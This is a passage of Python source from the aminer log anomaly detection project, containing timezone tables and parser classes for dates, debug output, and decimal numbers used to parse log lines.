License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import sys import time import logging import locale from typing import Union, List, Set from datetime import timezone, datetime from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement timezone_info = { "A": 1 * 3600, "ACDT": 10.5 * 3600, "ACST": 9.5 * 3600, "ACT": -5 * 3600, "ACWST": 8.75 * 3600, "ADT": 4 * 3600, "AEDT": 11 * 3600, "AEST": 10 * 3600, "AET": 10 * 3600, "AFT": 4.5 * 3600, "AKDT": -8 * 3600, "AKST": -9 * 3600, "ALMT": 6 * 3600, "AMST": -3 * 3600, "AMT": -4 * 3600, "ANAST": 12 * 3600, "ANAT": 12 * 3600, "AQTT": 5 * 3600, "ART": -3 * 3600, "AST": 3 * 3600, "AT": -4 * 3600, "AWDT": 9 * 3600, "AWST": 8 * 3600, "AZOST": 0 * 3600, "AZOT": -1 * 3600, "AZST": 5 * 3600, "AZT": 4 * 3600, "AoE": -12 * 3600, "B": 2 * 3600, "BNT": 8 * 3600, "BOT": -4 * 3600, "BRST": -2 * 3600, "BRT": -3 * 3600, "BST": 6 * 3600, "BTT": 6 * 3600, "C": 3 * 3600, "CAST": 8 * 3600, "CAT": 2 * 3600, "CCT": 6.5 * 3600, "CDT": -5 * 3600, "CEST": 2 * 3600, "CET": 1 * 3600, "CHADT": 13.75 * 3600, "CHAST": 12.75 * 3600, "CHOST": 9 * 3600, "CHOT": 8 * 3600, "CHUT": 10 * 3600, "CIDST": -4 * 3600, "CIST": -5 * 3600, "CKT": -10 * 3600, "CLST": -3 * 3600, "CLT": -4 * 3600, "COT": -5 * 3600, "CST": -6 * 3600, "CT": -6 * 3600, "CVT": -1 * 3600, "CXT": 7 * 3600, "ChST": 10 * 3600, "D": 4 * 3600, "DAVT": 7 * 3600, "DDUT": 10 * 3600, "E": 5 * 3600, "EASST": -5 * 3600, "EAST": -6 * 3600, "EAT": 3 * 3600, "ECT": -5 * 3600, "EDT": -4 * 3600, "EEST": 3 * 3600, "EET": 2 * 3600, "EGST": 0 * 3600, "EGT": -1 * 3600, "EST": -5 * 3600, "ET": -5 * 3600, "F": 6 * 3600, "FET": 3 * 3600, "FJST": 13 * 3600, "FJT": 12 * 3600, "FKST": -3 * 3600, "FKT": -4 * 3600, "FNT": -2 * 3600, "G": 7 * 3600, "GALT": -6 * 3600, "GAMT": -9 * 3600, "GET": 4 * 3600, "GFT": -3 * 3600, "GILT": 12 * 3600, "GMT": 0 * 3600, "GST": 4 * 3600, "GYT": -4 * 3600, "H": 8 * 3600, "HDT": -9 * 3600, "HKT": 8 * 3600, "HOVST": 8 * 3600, "HOVT": 7 * 3600, "HST": -10 * 3600, "I": 9 * 3600, "ICT": 7 * 3600, "IDT": 3 * 3600, "IOT": 6 * 3600, "IRDT": 4.5 * 3600, "IRKST": 9 * 3600, "IRKT": 8 * 3600, "IRST": 3.5 * 3600, "IST": 5.5 * 3600, "JST": 9 * 3600, "K": 10 * 3600, "KGT": 6 * 3600, "KOST": 11 * 3600, "KRAST": 8 * 3600, "KRAT": 7 * 3600, "KST": 9 * 3600, "KUYT": 4 * 3600, "L": 11 * 3600, "LHDT": 11 * 3600, "LHST": 10.5 * 3600, "LINT": 14 * 3600, "M": 12 * 3600, "MAGST": 12 * 3600, "MAGT": 11 * 3600, "MART": 9.5 * 3600, "MAWT": 5 * 3600, "MDT": -6 * 3600, "MHT": 12 * 3600, "MMT": 6.5 * 3600, "MSD": 4 * 3600, "MSK": 3 * 3600, "MST": -7 * 3600, "MT": -7 * 3600, "MUT": 4 * 3600, "MVT": 5 * 3600, "MYT": 8 * 3600, "N": -1 * 3600, "NCT": 11 * 3600, "NDT": 2.5 * 3600, "NFT": 11 * 3600, "NOVST": 7 * 3600, "NOVT": 7 * 3600, "NPT": 5.5 * 3600, "NRT": 12 * 3600, "NST": 3.5 * 3600, "NUT": -11 * 3600, "NZDT": 13 * 3600, "NZST": 12 * 3600, "O": -2 * 3600, "OMSST": 7 * 3600, "OMST": 6 * 3600, "ORAT": 5 * 3600, "P": -3 * 3600, "PDT": -7 * 3600, "PET": -5 * 3600, "PETST": 12 * 3600, "PETT": 12 * 3600, "PGT": 10 * 3600, "PHOT": 13 * 3600, "PHT": 8 * 3600, "PKT": 5 * 3600, "PMDT": -2 * 3600, "PMST": -3 * 3600, "PONT": 11 * 3600, "PST": -8 * 3600, "PT": -8 * 3600, "PWT": 9 * 3600, "PYST": -3 * 3600, "PYT": -4 * 3600, "Q": -4 * 3600, "QYZT": 6 * 3600, "R": -5 * 3600, "RET": 4 * 3600, "ROTT": -3 * 3600, "S": -6 * 3600, "SAKT": 11 * 3600, "SAMT": 4 * 3600, "SAST": 2 * 3600, "SBT": 11 * 3600, "SCT": 4 * 3600, "SGT": 8 * 3600, "SRET": 11 * 3600, "SRT": -3 * 3600, "SST": -11 * 3600, "SYOT": 3 * 3600, "T": -7 * 3600, "TAHT": -10 * 3600, "TFT": 5 * 3600, "TJT": 5 * 3600, "TKT": 13 * 3600, "TLT": 9 * 3600, "TMT": 5 * 3600, "TOST": 14 * 3600, "TOT": 13 * 3600, "TRT": 3 * 3600, "TVT": 12 * 3600, "U": -8 * 3600, "ULAST": 9 * 3600, "ULAT": 8 * 3600, "UTC": 0 * 3600, "UYST": -2 * 3600, "UYT": -3 * 3600, "UZT": 5 * 3600, "V": -9 * 3600, "VET": -4 * 3600, "VLAST": 11 * 3600, "VLAT": 10 * 3600, "VOST": 6 * 3600, "VUT": 11 * 3600, "W": -10 * 3600, "WAKT": 12 * 3600, "WARST": -3 * 3600, "WAST": 2 * 3600, "WAT": 1 * 3600, "WEST": 1 * 3600, "WET": 0 * 3600, "WFT": 12 * 3600, "WGST": -2 * 3600, "WGT": -3 * 3600, "WIB": 7 * 3600, "WIT": 9 * 3600, "WITA": 8 * 3600, "WST": 14 * 3600, "WT": 0 * 3600, "X": -11 * 3600, "Y": -12 * 3600, "YAKST": 10 * 3600, "YAKT": 9 * 3600, "YAPT": 10 * 3600, "YEKST": 6 * 3600, "YEKT": 5 * 3600, "Z": 0 * 3600} search_tz_dict = {} keys = list(timezone_info.keys()) keys.sort() for idx in range(65, 91): search_tz_dict[idx] = [x.encode() for x in keys if x.encode()[0] == idx] search_tz_dict[idx].sort(key=len, reverse=True) # sorts by descending length class DateTimeModelElement(ModelElementInterface): """This class defines a model element to parse date or datetime values. The element is similar to the strptime function but does not use it due to the numerous problems associated with it, e.g. no leap year support for semiqualified years, no %s (seconds since epoch) format in Python strptime, no %f support in libc strptime, no support to determine the length of the parsed string. """ def __init__(self, element_id: str, date_format: bytes, time_zone: timezone = None, text_locale: Union[str, tuple] = None, start_year: int = None, max_time_jump_seconds: int = 86400, timestamp_scale: int = 1): """Create a DateTimeModelElement to parse dates using a custom, timezone and locale-aware implementation similar to strptime. @param element_id an identifier for the ModelElement which is shown in the path. @param date_format, is a byte string that represents the date format for parsing, see Python strptime specification for available formats. Supported format specifiers are: * %b: month name in current locale * %d: day in month, can be space or zero padded when followed by separator or at end of string. * %f: fraction of seconds (the digits after the ".") * %H: hours from 00 to 23 * %M: minutes * %m: two-digit month number * %S: seconds * %s: seconds since the epoch (1970-01-01) * %Y: 4 digit year number * %z: detect and parse timezone strings like UTC, CET, +0001, etc. automatically. Common formats are: * "%b %d %H:%M:%S" e.g. for "Nov 19 05:08:43" * "%d.%m.%YT%H:%M:%S" e.g. for "07.02.2019T11:40:00" * "%d.%m.%Y %H:%M:%S.%f" e.g. for "07.02.2019 11:40:00.123456" * "%d.%m.%Y %H:%M:%S%z" e.g. for "07.02.2019 11:40:00+0000" or "07.02.2019 11:40:00 UTC" * "%d.%m.%Y" e.g. for "07.02.2019" * "%H:%M:%S" e.g. for "11:40:23" @param time_zone the timezone for parsing the values or UTC when None. @param text_locale the locale to use for parsing the day, month names or None to use the default locale. The locale must be a tuple of (locale, encoding) or a string. @param start_year when parsing date records without any year information, assume this is the year of the first value parsed. @param max_time_jump_seconds for detection of year wraps with date formats missing year information, also the current time of values has to be tracked. This value defines the window within that the time may jump between two matches. When not within that window, the value is still parsed, corrected to the most likely value but does not change the detection year. @param timestamp_scale scales the seconds in %s to get seconds (=1), milliseconds (=1000), microseconds (=1000000), etc. """ self.text_locale = text_locale super().__init__(element_id, date_format=date_format, time_zone=time_zone, text_locale=text_locale, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds, timestamp_scale=timestamp_scale) if time_zone is None: self.time_zone = timezone.utc # Make sure that date_format is valid and extract the relevant parts from it. self.format_has_year_flag = False self.format_has_tz_specifier = False self.date_format_parts: Union[List[Union[bytes, tuple]]] = [] self.scan_date_format(date_format) if (not self.format_has_year_flag) and (start_year is None): self.start_year = time.gmtime(None).tm_year elif start_year is None: # this is needed so start_year is at any point an integer. (instead of being None) self.start_year = 0 self.last_parsed_seconds = 0 self.epoch_start_time = datetime.fromtimestamp(0, self.time_zone) def scan_date_format(self, date_format: bytes): """Scan the date format.""" if len(self.date_format_parts) > 0: msg = "Cannot rescan date format after initialization" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) date_format_parts: List[Union[bytes, tuple]] = [] date_format_type_set: Set[int] = set() scan_pos = 0 while scan_pos < len(date_format): next_param_pos = date_format.find(b"%", scan_pos) if next_param_pos < 0: next_param_pos = len(date_format) new_element: Union[bytes, tuple, None] = None if next_param_pos != scan_pos: new_element = date_format[scan_pos:next_param_pos] else: param_type_code = date_format[next_param_pos + 1:next_param_pos + 2] next_param_pos = scan_pos + 2 if param_type_code == b"%": new_element = b"%" elif param_type_code == b"b": import calendar name_dict = {} for month_pos in range(1, 13): name_dict[calendar.month_name[month_pos][:3].encode()] = month_pos new_element = (1, 3, name_dict) elif param_type_code == b"d": new_element = (2, 2, int) elif param_type_code == b"f": new_element = (6, -1, DateTimeModelElement.parse_fraction) elif param_type_code == b"H": new_element = (3, 2, int) elif param_type_code == b"M": new_element = (4, 2, int) elif param_type_code == b"m": new_element = (1, 2, int) elif param_type_code == b"S": new_element = (5, 2, int) elif param_type_code == b"s": new_element = (7, -1, int) elif param_type_code == b"Y": self.format_has_year_flag = True new_element = (0, 4, int) elif param_type_code == b"z": self.format_has_tz_specifier = True scan_pos = next_param_pos continue else: msg = f"Unknown dateformat specifier {repr(param_type_code)}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if isinstance(new_element, bytes): if date_format_parts and (isinstance(date_format_parts[-1], bytes)): date_format_parts[-1] += new_element else: date_format_parts.append(new_element) else: if new_element[0] in date_format_type_set: msg = f"Multiple format specifiers for type {new_element[0]}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) date_format_type_set.add(new_element[0]) date_format_parts.append(new_element) scan_pos = next_param_pos if (7 in date_format_type_set) and (not date_format_type_set.isdisjoint(set(range(0, 6)))): msg = "Cannot use %s (seconds since epoch) with other non-second format types" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.date_format_parts = date_format_parts def get_match_element(self, path: str, match_context): """Try to find a match on given data for this model element and all its children. When a match is found, the match_context is updated accordingly. @param path to be printed in the MatchElement. @param match_context the match_context to be analyzed. @return None when there is no match, MatchElement otherwise. The match_object returned is a tuple containing the datetime object and the seconds since 1970. """ parse_pos = 0 # Year, month, day, hour, minute, second, fraction, gmt-seconds: result: List = [0, 0, 0, 0, 0, 0, 0, 0] for part_pos, date_format_part in enumerate(self.date_format_parts): if isinstance(date_format_part, bytes): if not match_context.match_data[parse_pos:].startswith(date_format_part): return None parse_pos += len(date_format_part) continue next_length = date_format_part[1] next_data = None if next_length < 0: # No length given: this is only valid for integer fields or fields followed by a separator string. if (part_pos + 1) < len(self.date_format_parts): next_part = self.date_format_parts[part_pos + 1] if isinstance(next_part, bytes): end_pos = match_context.match_data.find(next_part, parse_pos) if end_pos < 0: return None next_length = end_pos - parse_pos if next_length < 0: # No separator, so get the number of decimal digits. next_length = 0 for digit_ord in match_context.match_data[parse_pos:]: if (digit_ord < 0x30) or (digit_ord > 0x39): break next_length += 1 if next_length == 0: return None next_data = match_context.match_data[parse_pos:parse_pos + next_length] else: next_data = match_context.match_data[parse_pos:parse_pos + next_length] if len(next_data) != next_length: return None parse_pos += next_length transform_function = date_format_part[2] if isinstance(transform_function, dict): value = None try: value = transform_function.get(next_data, None) except ValueError: pass if value is None: return None result[date_format_part[0]] = value else: try: result[date_format_part[0]] = transform_function(next_data) except ValueError: # Parsing failed, most likely due to wrong format. return None date_str = match_context.match_data[:parse_pos] result[7] /= self.timestamp_scale # Now combine the values and build the final value. parsed_date_time = None total_seconds = result[7] if total_seconds != 0: total_seconds += result[6] # For epoch second formats, the datetime value usually is not important. So stay with parsed_date_time to none. else: if not self.format_has_year_flag: result[0] = self.start_year microseconds = int(result[6] * 1000000) try: if 0 in (result[0], result[1], result[2]): current_date = datetime.now() if result[0] == 0: result[0] = current_date.year if result[1] == 0: result[1] = current_date.month if result[2] == 0: result[2] = current_date.day parsed_date_time = datetime(result[0], result[1], result[2], result[3], result[4], result[5], microseconds, self.time_zone) except ValueError: # The values did not form a valid datetime object, e.g. when the day of month is out of range. The rare case where dates # without year are parsed and the last parsed timestamp was from the previous non-leap year but the current timestamp is it, # is ignored. Values that sparse and without a year number are very likely to result in invalid data anyway. return None # Avoid timedelta.total_seconds(), not supported in Python 2.6. delta = parsed_date_time - self.epoch_start_time total_seconds = (delta.days * 86400 + delta.seconds) # See if this is change from one year to next. if not self.format_has_year_flag: if self.last_parsed_seconds == 0: # There cannot be a wraparound if we do not know any previous time values yet. self.last_parsed_seconds = total_seconds else: delta_seconds = self.last_parsed_seconds - total_seconds if abs(delta_seconds) <= self.max_time_jump_seconds: self.last_parsed_seconds = total_seconds else: # This might be the first date value for the next year or one from the previous. # Test both cases and see, what is more likely. date_error = False try: next_year_date_time = parsed_date_time.replace(self.start_year + 1) delta = next_year_date_time - self.epoch_start_time next_year_total_seconds = (delta.days * 86400 + delta.seconds) except ValueError: date_error = True if not date_error and next_year_total_seconds - self.last_parsed_seconds <= self.max_time_jump_seconds: self.start_year += 1 parsed_date_time = next_year_date_time total_seconds = next_year_total_seconds self.last_parsed_seconds = total_seconds msg = f"DateTimeModelElement unqualified timestamp year wraparound detected from " \ f"{datetime.fromtimestamp(self.last_parsed_seconds, self.time_zone).isoformat()} to " \ f"{parsed_date_time.isoformat()}" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print("WARNING: " + msg, file=sys.stderr) else: try: last_year_date_time = parsed_date_time.replace(self.start_year - 1) delta = last_year_date_time - self.epoch_start_time last_year_total_seconds = (delta.days * 86400 + delta.seconds) except ValueError: date_error = True if not date_error and self.last_parsed_seconds - last_year_total_seconds <= self.max_time_jump_seconds: parsed_date_time = last_year_date_time total_seconds = last_year_total_seconds self.last_parsed_seconds = total_seconds else: # None of both seems correct, just report that. msg = f"DateTimeModelElement time inconsistencies parsing {repr(date_str)}, expecting value around " \ f"{self.last_parsed_seconds}. Check your settings!" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print("WARNING: " + msg, file=sys.stderr) # We discarded the parsed_date_time microseconds beforehand, use the full float value here instead of the rounded integer. if result[6] is not None: total_seconds += result[6] if self.format_has_tz_specifier: valid_tz_specifier = True offset_allowed = True tz_specifier_offset = 0. if match_context.match_data[parse_pos] == ord(b" "): parse_pos += 1 resulting_key = None # only if the next character is in A-Z, a valid resulting_key can exist. if match_context.match_data[parse_pos] in search_tz_dict: # search the first fitting resulting_key in the sorted tz_dict and break the loop. for key in search_tz_dict[match_context.match_data[parse_pos]]: if match_context.match_data[parse_pos:].startswith(key): resulting_key = key break # an offset is only allowed with UTC and GMT. if resulting_key not in (b"UTC", b"GMT"): offset_allowed = False if resulting_key is not None: # get the offset from the timezone_info dict. tz_specifier_offset = timezone_info[resulting_key.decode()] parse_pos += len(resulting_key) if match_context.match_data[parse_pos] in (ord(b"+"), ord(b"-")) and offset_allowed and valid_tz_specifier: sign = -1 if match_context.match_data[parse_pos] == ord(b"+"): sign = 1 parse_pos += 1 cnt_digits = 0 colon_shift = 0 # parse data as long as there is more data. while parse_pos < len(match_context.match_data): # shift the position and count to the next position, if the current character is a digit. if chr(match_context.match_data[parse_pos]).isdigit(): cnt_digits += 1 parse_pos += 1 # if the current character is no digit and cnt_digits is 2, a colon is allowed. elif cnt_digits == 2 and match_context.match_data[parse_pos] == ord(b":"): parse_pos += 1 colon_shift = 1 else: break # if the digit count is not 4 and a colon is found, then no colon shift should be applied. This could be the case, if a # colon follows the date (02.11.2021 UTC+01: some text) if cnt_digits != 4 and colon_shift == 1: parse_pos -= 1 colon_shift = 0 # if the digits count is zero or bigger than 4, then the specifier is not valid. if cnt_digits == 0 or cnt_digits > 4: valid_tz_specifier = False else: # only one hour position was found. if cnt_digits == 1: tz_specifier_offset = sign * int(chr(match_context.match_data[parse_pos-1])) * 3600 # two hours specifiers were found. elif cnt_digits == 2: tz_specifier_offset = sign * int(match_context.match_data[parse_pos-2:parse_pos].decode()) * 3600 # four time specifiers were found with an optional colon. elif cnt_digits == 4: tz_specifier_offset = sign * int(match_context.match_data[parse_pos-4-colon_shift:parse_pos-2-colon_shift]) * \ 3600 + int(match_context.match_data[parse_pos-2:parse_pos] * 60) if parse_pos < len(match_context.match_data) and match_context.match_data[parse_pos] == ord(b"Z"): parse_pos += 1 if valid_tz_specifier: date_str = match_context.match_data[:parse_pos] # the offset must be subtracted, because the timestamp should always be UTC. total_seconds -= tz_specifier_offset match_context.update(date_str) return MatchElement(f"{path}/{self.element_id}", date_str, total_seconds, None) @staticmethod def parse_fraction(value_str: bytes): """Pass this method as function pointer to the parsing logic.""" return float(b"0." + value_str) class MultiLocaleDateTimeModelElement(ModelElementInterface): """ This class defines a model element to parse date or datetime values from log sources. The date or datetime can contain timestamps encoded in different locales or on machines, where host/service locale does not match data locale(s). CAVEAT: Unlike other model elements, this element is not completely stateless! As parsing of semi qualified date values without any year information may produce wrong results, e.g. wrong year or 1 day off due to incorrect leap year handling, this object will keep track of the most recent timestamp parsed and will use it to regain information about the year in semi qualified date values. Still this element will not complain when parsed timestamp values are not strictly sorted, this should be done by filtering modules later on. The sorting requirements here are only, that each new timestamp value may not be more than 2 days before and 1 month after the most recent one observer. Internal operation: * When creating the object, make sure that there are no ambiguous dateFormats in the list, e.g. one with "day month" and another one with "month day". * To avoid decoding of binary input data in all locales before searching for e.g. month names, convert all possible month names to bytes during object creation and just keep the lookup list. """ def __init__(self, element_id: str, date_formats: list, start_year: int = None, max_time_jump_seconds: int = 86400): """Create a new MultiLocaleDateTimeModelElement object. @param element_id an identifier for the ModelElement which is shown in the path. @param date_formats this parameter is a list of tuples, each tuple containing information about one date format to support. The tuple structure is (format_string, format_timezone, format_locale). The format_string may contain the same elements as supported by strptime from datetime.datetime. The format_locale defines the locale for the string content, e.g. de_DE for german, but also the data IO encoding, e.g. ISO-8859-1. The locale information has to be available, e.g. using "locale-gen" on Debian systems. The format_timezone can be used to define the timezone of the timestamp parsed. When None, UTC is used. The timezone support may only be sufficient for very simple use-cases, e.g. all data from one source configured to create timestamps in that timezone. @param start_year when given, parsing will use this year value for semi qualified timestamps to add correct year information. This is especially relevant for historic datasets as otherwise leap year handling may fail. The startYear parameter will only take effect when the first timestamp to be parsed by this object is also semi qualified. Otherwise, the year information is extracted from this record. When empty and first parsing invocation involves a semi qualified date, the current year in UTC timezone is used. @param max_time_jump_seconds for detection of year wraps with date formats missing year information, also the current time of values has to be tracked. This value defines the window within that the time may jump between two matches. When not within that window, the value is still parsed, corrected to the most likely value but does not change the detection year. """ super().__init__(element_id, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) if len(date_formats) == 0: msg = "At least one date_format must be specified." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) format_has_year_flag = False default_locale = locale.getdefaultlocale() self.date_time_model_elements: List[DateTimeModelElement] = [] for i, date_format in enumerate(date_formats): if not isinstance(date_format, tuple): msg = "date_format must be of type tuple." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if len(date_format) != 3: msg = "date_format consist of 3 elements." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) date_format, time_zone, text_locale = date_format if isinstance(text_locale, str) and len(text_locale) < 1: msg = "empty text_locale is not allowed." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) for date_time_model_element in self.date_time_model_elements: if date_format.startswith(date_time_model_element.date_format): msg = f"Invalid order of date_formats. {date_format.decode()} starts with " \ f"{date_time_model_element.date_format.decode()}. More specific datetimes would be skipped." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.date_time_model_elements.append(DateTimeModelElement( element_id + "/format" + str(i), date_format, time_zone, text_locale, start_year, max_time_jump_seconds)) format_has_year_flag = format_has_year_flag and self.date_time_model_elements[-1].format_has_year_flag # The latest parsed timestamp value. self.latest_parsed_timestamp = None # Restore previous locale settings. There seems to be no way in python to get back to the exact same state. Hence, perform the # reset only when locale has changed. This would also change the locale from (None, None) to some system-dependent locale. if locale.getlocale() != default_locale: locale.resetlocale() if (not format_has_year_flag) and (start_year is None): self.start_year = time.gmtime(None).tm_year elif start_year is None: # this is needed so start_year is at any point an integer. (instead of being None) self.start_year = 0 self.last_parsed_seconds = 0 def get_match_element(self, path: str, match_context): """Check if the data to match within the content is suitable to be parsed by any of the supplied date formats. @param path to be printed in the MatchElement. @param match_context the match_context to be analyzed. @return On match return a match_object containing a tuple of the datetime object and the seconds since 1970. When not matching, None is returned. When the timestamp data parsed would be far off from the last ones parsed, so that correction may not be applied correctly, then the method will also return None. """ for i, date_time_model_element in enumerate(self.date_time_model_elements): locale.setlocale(locale.LC_ALL, date_time_model_element.text_locale) self.date_time_model_elements[i].last_parsed_seconds = self.last_parsed_seconds self.date_time_model_elements[i].start_year = self.start_year match_element = date_time_model_element.get_match_element(path, match_context) if match_element is not None: self.last_parsed_seconds = date_time_model_element.last_parsed_seconds self.start_year = date_time_model_element.start_year return match_element return None DebugModelElement.py000066400000000000000000000045321500476301700344660ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines a debug model element that can be used to check whether a specific position in the parsing tree is reached by log atoms. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import sys import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ModelElementInterface import ModelElementInterface class DebugModelElement(ModelElementInterface): """This class defines a model element matching any data of length zero at any position. Thus, it can never fail to match and can be inserted at any position in the parsing tree, where matching itself does not alter parsing flow (see e.g. FirstMatchModelElement). It will immediately write the current state of the match to stderr for inspection. """ def __init__(self, element_id: str): """Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. """ super().__init__(element_id) # To avoid having those elements hidden in production configuration, write a line every time the class is instantiated. msg = f"DebugModelElement {element_id} added" logging.getLogger(DEBUG_LOG_NAME).info(msg) print(msg, file=sys.stderr) def get_match_element(self, path: str, match_context): """ @param path to be printed in the MatchElement. @param match_context the match_context to be analyzed. @return Always return a match. """ msg = f'DebugModelElement path = "{path}/{self.element_id}", unmatched = "{repr(match_context.match_data)}"' logging.getLogger(DEBUG_LOG_NAME).info(msg) print(msg, file=sys.stderr) return MatchElement(f"{path}/{self.element_id}", b"", b"", None) DecimalFloatValueModelElement.py000066400000000000000000000127611500476301700367640ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines an model element for decimal number parsing as float. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement class DecimalFloatValueModelElement(ModelElementInterface): """This class defines a model to parse decimal values with optional signum, padding or exponent. With padding, the signum has to be found before the padding characters. """ SIGN_TYPE_NONE = "none" SIGN_TYPE_OPTIONAL = "optional" SIGN_TYPE_MANDATORY = "mandatory" PAD_TYPE_NONE = "none" PAD_TYPE_ZERO = "zero" PAD_TYPE_BLANK = "blank" EXP_TYPE_NONE = "none" EXP_TYPE_OPTIONAL = "optional" EXP_TYPE_MANDATORY = "mandatory" def __init__(self, element_id: str, value_sign_type: str = SIGN_TYPE_NONE, value_pad_type: str = PAD_TYPE_NONE, exponent_type: str = EXP_TYPE_NONE): """Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param value_sign_type defines the possible start characters in the value. With the SIGN_TYPE_NONE only digits are allowed, with SIGN_TYPE_OPTIONAL digits and a minus sign are allowed and with SIGN_TYPE_MANDATORY the value must start with + or -. @param value_pad_type defines the padding values which can prefix the numerical value. With PAD_TYPE_NONE no padding is allowed, PAD_TYPE_ZERO allows zeros before the value and PAD_TYPE_BLANK allows spaces before the value. @param exponent_type defines the allowed types of exponential values. With EXP_TYPE_NONE no exponential values are allowed, EXP_TYPE_OPTIONAL allows exponential values and with EXP_TYPE_MANDATORY every value must contain exponential values. """ super().__init__(element_id, value_sign_type=value_sign_type, value_pad_type=value_pad_type, exponent_type=exponent_type) self.digits = set(b"0123456789") def get_match_element(self, path: str, match_context): """Find the maximum number of bytes forming a decimal number according to the parameters specified. @param path to be printed in the MatchElement. @param match_context the match_context to be analyzed. @return a match when at least one byte being a digit was found """ data = match_context.match_data if not data or (data[0] not in self.start_characters): return None match_len = 1 if self.pad_characters == b"" and data.startswith(b"0") and not data.startswith(b"0.") and len(data) > 1 and \ data[1] in self.digits: return None for test_byte in data[match_len:]: if test_byte not in self.pad_characters: break match_len += 1 num_start_pos = match_len for test_byte in data[match_len:]: if test_byte not in self.digits: break match_len += 1 if match_len == 1: if data[0] not in self.digits: return None elif num_start_pos == match_len and match_len == 1: # only return None if match_len is 1 to allow 00 with zero padding. return None # See if there is decimal part after decimal point. if (match_len < len(data)) and (chr(data[match_len]) == "."): match_len += 1 post_point_start = match_len for test_byte in data[match_len:]: if test_byte not in self.digits: break match_len += 1 if match_len == post_point_start - 1: # There has to be at least one digit after the decimal point. return None # See if there could be any exponent following the number. if (self.exponent_type != DecimalFloatValueModelElement.EXP_TYPE_NONE) and (match_len + 1 < len(data)) and ( data[match_len] in b"eE"): match_len += 1 if data[match_len] in b"+-": match_len += 1 exp_number_start = match_len for test_byte in data[match_len:]: if test_byte not in self.digits: break match_len += 1 if match_len == exp_number_start: # No exponent number found. return None elif self.exponent_type == DecimalFloatValueModelElement.EXP_TYPE_MANDATORY: return None match_string = data[:match_len] if self.pad_characters == b" " and match_string[0] in b"+-": if b" " in match_string.replace(b" ", b"", 1): return None match_value = float(match_string.replace(b" ", b"", 1)) else: match_value = float(match_string) match_context.update(match_string) return MatchElement(f"{path}/{self.element_id}", match_string, match_value, None) DecimalIntegerValueModelElement.py000066400000000000000000000111311500476301700373020ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/parsing"""This module defines an model element for integer number parsing. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer.parsing.MatchElement import MatchElement class DecimalIntegerValueModelElement(ModelElementInterface): """This class defines a model to parse integer values with optional signum or padding. If both are present, it is signum has to be before the padding characters. """ SIGN_TYPE_NONE = "none" SIGN_TYPE_OPTIONAL = "optional" SIGN_TYPE_MANDATORY = "mandatory" PAD_TYPE_NONE = "none" PAD_TYPE_ZERO = "zero" PAD_TYPE_BLANK = "blank" def __init__(self, element_id: str, value_sign_type: str = SIGN_TYPE_NONE, value_pad_type: str = PAD_TYPE_NONE): """Initialize the ModelElement. @param element_id an identifier for the ModelElement which is shown in the path. @param value_sign_type defines the possible start characters in the value. With the SIGN_TYPE_NONE only digits are allowed, with SIGN_TYPE_OPTIONAL digits and a minus sign are allowed and with SIGN_TYPE_MANDATORY the value must start with + or -. @param value_pad_type defines the padding values which can prefix the numerical value. With PAD_TYPE_NONE no padding is allowed, PAD_TYPE_ZERO allows zeros before the value and PAD_TYPE_BLANK allows spaces before the value. """ super().__init__(element_id, value_sign_type=value_sign_type, value_pad_type=value_pad_type) if value_sign_type not in (DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL, DecimalIntegerValueModelElement.SIGN_TYPE_MANDATORY): msg = f"Invalid value_sign_type {value_sign_type}" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if value_pad_type not in 